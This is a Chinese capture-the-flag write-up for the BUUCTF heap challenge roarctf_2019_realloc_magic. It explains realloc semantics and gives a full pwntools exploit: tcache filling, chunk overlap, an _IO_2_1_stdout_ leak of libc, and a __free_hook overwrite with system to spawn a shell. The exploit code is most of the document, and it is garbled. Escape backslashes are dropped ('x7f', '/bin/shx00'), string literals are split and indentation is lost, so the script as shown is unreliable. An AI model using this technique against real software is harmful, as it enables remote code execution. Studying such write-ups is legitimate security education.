realloc的特点
他的基础功能是改变mem_address所指内存区域的大小为newsize长度。这里就有几种不同的情况
1.当size为0,这时就相当于free()函数,同时返回值为null
2.当指针为0,size大于0,相当于malloc函数
3.size小于等于原来的size,则在原先的基础上缩小,多余的free掉
4.size大于原来的size,如果有空间就原基础扩充,空间不足则分配新的内存,将内容复制到新的内存中,然后再将原来的内存free掉。
思路
1.首先填满tcache,再次free一个chunk让其进入unsorted bin,这样可以在fd处踩出main_arena的地址,然后我们通过ovarlap修改fd为_IO_2_1_stdout_的地址(需要爆破一位)
2.接下来跟fast bin attack相似,我们malloc两次即可分配到_IO_2_1_stdout_处的内存(这里其中一个堆块设置为0x41,这样free后他就不会回到原来的tcache)
3.修改内存为p64(0xfbad1887)+p64(0)*3+p8(0x58)(至于这个原理,可以参考ex师傅和railgun师傅的博客,链接地址放在博客的后面),当程序再次调用puts时,就会泄露libc上的地址
4.接下来故技重施,将chunk分配到free_hook处,改free_hook为system地址,同时给上"/bin/sh",再次调用free函数即可拿shell
exp
from pwn import *
#r = remote("node3.buuoj.cn", 25009)
#r = process("./roarctf_2019_realloc_magic")
elf = ELF("./roarctf_2019_realloc_magic")
libc = ELF('./libc/libc-2.27.so')
def realloc(size, content):
r.recvuntil(">> ")
r.sendline('1')
r.recvuntil("Size?
")
r.sendline(str(size))
r.recvuntil("Content?
")
r.send(content)
def delete():
r.recvuntil(">> ")
r.sendline('2')
def back():
r.recvuntil(">> ")
r.sendline('666')
def pwn():
realloc(0x70,'a')
realloc(0,'')
realloc(0x100,'b')
realloc(0,'')
realloc(0xa0,'c')
realloc(0,'')
realloc(0x100,'b')
[delete() for i in range(7)] #fill tcache
realloc(0,'') #to unsortbin fd->arena
realloc(0x70,'a')
realloc(0x180,'c'*0x78+p64(0x41)+p8(0x60)+p8(0x87))#overlap
realloc(0,'')
realloc(0x100,'a')
realloc(0,'')
realloc(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))#get _IO_2_1_stdout_ change flag and write_base
#get_libc
libc_base = u64(r.recvuntil("x7f",timeout=0.1)[-6:].ljust(8,'x00'))-0x3e82a0 # _IO_2_1_stderr_+216 store _IO_file_jumps
if libc_base == -0x3e82a0:
exit(-1)
print(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system = libc_base + libc.sym['system']
one_gadget=libc_base + 0x4f322
r.sendline('666')
realloc(0x120,'a')
realloc(0,'')
realloc(0x130,'a')
realloc(0,'')
realloc(0x170,'a')
realloc(0,'')
realloc(0x130,'a')
[delete() for i in range(7)]
realloc(0,'')
realloc(0x120,'a')
realloc(0x260,'a'*0x128+p64(0x41)+p64(free_hook-8))
realloc(0,'')
realloc(0x130,'a')
realloc(0,'')
realloc(0x130,'/bin/shx00'+p64(system))
delete()
r.interactive()
if __name__ == "__main__":
while True:
r = remote("node3.buuoj.cn", 29425)
try:
pwn()
except:
r.close()
感谢railgun师傅的指点!
内容来源
ex_利用 IO_2_1_stdout 泄露信息
railgun_探究利用_IO_2_1_stdout_ 泄露libc
BUUCTF-PWN roarctf_2019_realloc_magic